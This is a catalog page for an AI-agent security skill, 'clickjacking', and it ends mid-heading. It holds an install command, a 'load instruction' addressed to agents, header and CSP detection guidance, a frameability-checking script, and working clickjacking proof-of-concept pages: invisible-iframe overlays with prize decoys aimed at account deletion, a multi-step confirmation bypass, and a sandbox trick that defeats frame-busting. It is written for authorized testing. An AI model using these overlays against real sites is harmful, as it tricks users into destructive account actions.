
Clickjacking
Test whether pages can be framed and whether clickjacking can drive sensitive actions when X-Frame-Options or CSP frame-ancestors are weak or missing.
Overview
clickjacking is an agent skill for the Ship phase that runs a UI redress playbook for framing headers, CSP, and sensitive-action clickjacking tests.
Install
npx skills add https://github.com/yaklang/hack-skills --skill clickjacking
What is this skill?
- Core UI redress model: transparent iframe overlay with decoy controls on attacker page
- Detection flow for X-Frame-Options DENY, SAMEORIGIN, deprecated ALLOW-FROM, and missing headers
- CSP frame-ancestors evaluation and bypass angles alongside multi-step clickjacking
- Drag-and-drop redress patterns and chaining guidance when findings escalate severity
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You are unsure if critical actions on your app can be triggered inside a malicious framed page.
Who is it for?
Indie SaaS builders and testers doing authorized AppSec review before launch or after auth/billing UI changes.
Skip if: Non-security feature work or attacking third-party sites without explicit permission.
When should I use this skill?
Use when testing whether target pages can be framed, X-Frame-Options or CSP frame-ancestors are properly configured, and UI redress can trigger sensitive actions.
What do I get? / Deliverables
You get a structured test plan for frameability, header/CSP gaps, and proof-of-concept overlay scenarios for reporting or fixes.
- Frameability and header/CSP assessment notes
- PoC overlay HTML patterns suitable for a security report
Journey fit
UI redress testing belongs in pre-production security assessment, so Ship → security is the primary catalog shelf. Security covers framing headers, CSP, and chained abuse of admin actions—not general frontend polish.
How it compares
Offensive framing and CSP test playbook—not a generator for marketing landing pages or SEO content.
Common Questions / FAQ
Who is clickjacking for?
Solo builders and security testers who need a consistent clickjacking assessment method for web apps they own or are hired to test.
When should I use clickjacking?
During Ship → security before go-live or after adding admin, account, or payment flows that must not be frameable by attackers.
Is clickjacking safe to install?
It documents attack techniques for authorized testing; review the Security Audits panel on this page and never use it against sites you do not control.
SKILL.md - Clickjacking
# SKILL: Clickjacking — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Clickjacking (UI redress) techniques. Covers iframe transparency tricks, X-Frame-Options bypass, CSP frame-ancestors, multi-step clickjacking, drag-and-drop attacks, and chaining with other vulnerabilities. Often a "low severity" finding that becomes critical when targeting admin actions.

## 1. CORE CONCEPT

Clickjacking loads a target page in a transparent iframe overlaid on an attacker's page. The victim sees the attacker's UI but clicks on the invisible target page, performing unintended actions.

```html
<style>
  iframe {
    position: absolute; top: 0; left: 0;
    width: 100%; height: 100%;
    opacity: 0.0001;   /* invisible, but still receives the click */
    z-index: 2;        /* stacked above the decoy */
  }
  .decoy { position: absolute; top: 200px; left: 100px; z-index: 1; }
</style>
<div class="decoy"><button>Click to win a prize!</button></div>
<iframe src="https://target.com/account/delete?confirm=yes"></iframe>
```

---

## 2. DETECTION — IS THE PAGE FRAMEABLE?

### Check X-Frame-Options Header

```
X-Frame-Options: DENY            → cannot be framed (secure)
X-Frame-Options: SAMEORIGIN      → only same-origin framing (secure against cross-origin framing; Chromium and Firefox check the whole ancestor chain, not only the top-level document)
X-Frame-Options: ALLOW-FROM uri  → deprecated; Chromium and WebKit never supported it and ignore the whole header, so treat the page as frameable in those browsers
(header absent)                  → frameable! (vulnerable, unless CSP frame-ancestors is set)
```

### Check CSP frame-ancestors

```
Content-Security-Policy: frame-ancestors 'none'         → cannot be framed
Content-Security-Policy: frame-ancestors 'self'         → same-origin only
Content-Security-Policy: frame-ancestors https://a.com  → only that origin may frame it
(directive absent)                                       → frameable (unless X-Frame-Options blocks it)
```

**CSP frame-ancestors supersedes X-Frame-Options** in modern browsers: when the directive is present, the X-Frame-Options header is ignored entirely, so an `X-Frame-Options: DENY` next to a permissive `frame-ancestors` does not protect the page. If the response carries several CSP headers, every policy that contains `frame-ancestors` must allow the framing origin.

A frameable page is only exploitable if the victim's session is present inside the frame. Session cookies with `SameSite=Lax` (the Chromium default for cookies that set no attribute) or `SameSite=Strict` are not sent on cross-site iframe loads, so confirm that the framed page renders in its authenticated state rather than showing the login page.

### Quick PoC Test

```html
<iframe src="https://target.com/sensitive-action" width="800" height="600"></iframe>
```

If the page loads in the iframe → frameable → potentially vulnerable. Check that it is the logged-in view of the page, not a login redirect, before building an overlay.
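The header checks above are easy to get wrong by hand once both headers and several CSP policies are in play. The following JavaScript evaluator is an added example, not code from the hack-skills skill: it applies the stated precedence (a `frame-ancestors` directive decides and X-Frame-Options is then ignored; otherwise X-Frame-Options applies; otherwise the page is frameable) to a set of response headers and a candidate framing origin. Header names are assumed to be lower-cased already, as Node's `http` module returns them, and every host and policy in the usage lines is constructed, not captured from a real site.

```javascript
// Added example: decide whether an attacker page at ancestorUrl could frame the
// response for targetUrl, given its response headers. Not part of the
// yaklang/hack-skills skill; hostnames below are constructed sample input.

function parseFrameAncestors(policy) {
  // Returns the lower-cased frame-ancestors source list, or null when the
  // policy has no such directive. CSP directives are ';'-separated.
  for (const directive of policy.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0 && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

function effectivePort(u) {
  if (u.port) return u.port;
  return u.protocol === 'https:' ? '443' : u.protocol === 'http:' ? '80' : '';
}

function schemeMatches(scheme, protocol) {
  // CSP lets an http: source match an https: ancestor (secure upgrade).
  return `${scheme}:` === protocol || (scheme === 'http' && protocol === 'https:');
}

function sourceAllows(source, target, ancestor) {
  if (source === "'none'") return false;
  if (source === "'self'") return ancestor.origin === target.origin;
  if (source === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) {          // scheme-source, e.g. "https:"
    return schemeMatches(source.slice(0, -1), ancestor.protocol);
  }
  // host-source: [scheme://]host[:port]; host may begin with "*."
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:\/]+)(?::(\d+|\*))?$/.exec(source);
  if (m === null) return false;                       // unsupported expression: no match
  const [, scheme, host, port] = m;
  // A scheme-less host-source inherits the framed resource's own scheme.
  if (!schemeMatches(scheme ?? target.protocol.slice(0, -1), ancestor.protocol)) return false;
  if (host.startsWith('*.')) {
    if (!ancestor.hostname.endsWith(host.slice(1))) return false;   // "*.example.com"
  } else if (host !== ancestor.hostname) {
    return false;
  }
  if (port !== undefined && port !== '*' && port !== effectivePort(ancestor)) return false;
  return true;
}

function evaluateFrameability(headers, targetUrl, ancestorUrl) {
  // headers: lower-case header name -> value string; for Content-Security-Policy
  // an array of strings when the header was sent more than once (all policies
  // are enforced, so every one that names frame-ancestors must allow the origin).
  const target = new URL(targetUrl);
  const ancestor = new URL(ancestorUrl);
  const policies = [].concat(headers['content-security-policy'] ?? []);
  const lists = policies.map(parseFrameAncestors).filter((l) => l !== null);
  if (lists.length > 0) {
    const allowed = lists.every((list) => list.some((s) => sourceAllows(s, target, ancestor)));
    return { frameable: allowed, reason: 'CSP frame-ancestors decides; X-Frame-Options is ignored' };
  }
  const xfo = headers['x-frame-options'];
  if (xfo !== undefined) {
    const value = String(xfo).trim().toUpperCase();
    if (value === 'DENY') return { frameable: false, reason: 'X-Frame-Options: DENY' };
    if (value === 'SAMEORIGIN') {
      return { frameable: ancestor.origin === target.origin, reason: 'X-Frame-Options: SAMEORIGIN' };
    }
    // ALLOW-FROM is deprecated and unsupported in Chromium/WebKit; an unrecognised
    // value makes those browsers ignore the header, i.e. it fails open.
    return { frameable: true, reason: `X-Frame-Options "${xfo}" ignored (deprecated or invalid value)` };
  }
  return { frameable: true, reason: 'no X-Frame-Options and no frame-ancestors directive' };
}

// Usage with constructed values: DENY loses to a permissive frame-ancestors.
const sample = {
  'x-frame-options': 'DENY',
  'content-security-policy': "default-src 'self'; frame-ancestors https://partner.example",
};
console.log(evaluateFrameability(sample, 'https://app.example/account', 'https://partner.example/'));
console.log(evaluateFrameability(sample, 'https://app.example/account', 'https://evil.example/'));
```

Feed it the headers of the actual response for the sensitive page (not the site root, since policies are often set per route), and run it once per framing origin you intend to test, including the target's own origin to confirm `'self'` and `SAMEORIGIN` behave as expected.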
### JavaScript Frame Detection (from target page source)

```javascript
// Common frame-busting code found in target pages:
if (top.location.hostname !== self.location.hostname) {
  top.location.href = self.location.href;
}
// Note: reading top.location.hostname from a cross-origin frame throws a
// SecurityError before the redirect runs, so this variant fails open exactly
// when it is needed. The comparison `if (top !== self)` does not have that problem.
```

If this code is present and the page does not also send CSP `frame-ancestors` (or X-Frame-Options), it can often be bypassed; see section 4.

---

## 3. PROOF OF CONCEPT TEMPLATES

### Basic Single-Click

```html
<html>
<head><title>Free Prize</title></head>
<body>
  <h1>Click the button to claim your prize!</h1>
  <style>
    iframe {
      position: absolute; top: 300px; left: 60px;
      width: 500px; height: 200px;
      opacity: 0.0001;
      z-index: 2;
    }
    .decoy { position: absolute; top: 340px; left: 120px; z-index: 1; }
  </style>
  <!-- decoy sits under the spot where the target's real button renders -->
  <div class="decoy"><button>Claim prize</button></div>
  <iframe src="https://target.com/account/settings?action=delete"></iframe>
</body>
</html>
```

While aligning, raise `opacity` to `0.5` so the target control is visible over the decoy, then drop it back to `0.0001` for the final PoC.

### Multi-Step Clickjacking

For actions requiring multiple clicks (e.g., "Are you sure?" confirmation):

```html
<style>
  iframe { position: absolute; top: -120px; left: -40px; width: 600px; height: 400px; opacity: 0.0001; z-index: 2; }
  .decoy { position: absolute; top: 300px; left: 60px; z-index: 1; }
</style>
<div id="step1" class="decoy"><button>Step 1: Click here</button></div>
<div id="step2" class="decoy" style="display:none"><button>Step 2: Confirm</button></div>
<iframe id="target" src="https://target.com/admin/action"></iframe>
<script>
  // The iframe on top consumes the click, so an onclick on the decoy never fires.
  // Use the iframe's load event instead: it fires again, even cross-origin, when
  // the first click navigates the framed page to its confirmation step.
  let loads = 0;
  document.getElementById('target').addEventListener('load', (e) => {
    if (++loads !== 2) return;              // 1st load = initial page, 2nd = confirmation page
    document.getElementById('step1').style.display = 'none';
    document.getElementById('step2').style.display = 'block';
    e.target.style.top = '-260px';          // re-align the confirm button under the step-2 decoy
    e.target.style.left = '-90px';          // (offsets are target-specific)
  });
</script>
```

Reposition the iframe for each step to align the transparent button with the decoy. If the confirmation is an in-page modal rather than a navigation, no `load` event fires; detect the click through the `blur` event on the parent window instead, which fires when focus moves into the iframe.

### Drag-and-Drop Clickjacking

Extract data from one iframe to another using HTML5 drag-and-drop events — the victim drags across invisible iframes, transferring tokens or data. Current browsers restrict cross-origin drag-and-drop of page content, so confirm the behaviour in the target browser before reporting it.

---

## 4. BYPASS TECHNIQUES

### Frame-Busting Script Bypass

Some pages use JavaScript frame-busting:

```javascript
if (top !== self) {
  top.location = self.location;
}
```

**Bypass with sandbox attribute**:

```html
<iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting: the framed
     page's `top.location = ...` is silently blocked, while allow-scripts and
     allow-forms keep its buttons and forms working. Omitting allow-same-origin
     puts the frame in an opaque origin; the request still carries cookies,
     subject to their SameSite attribute. -->
```

### X-Frame-Options ALLOW-FROM Byp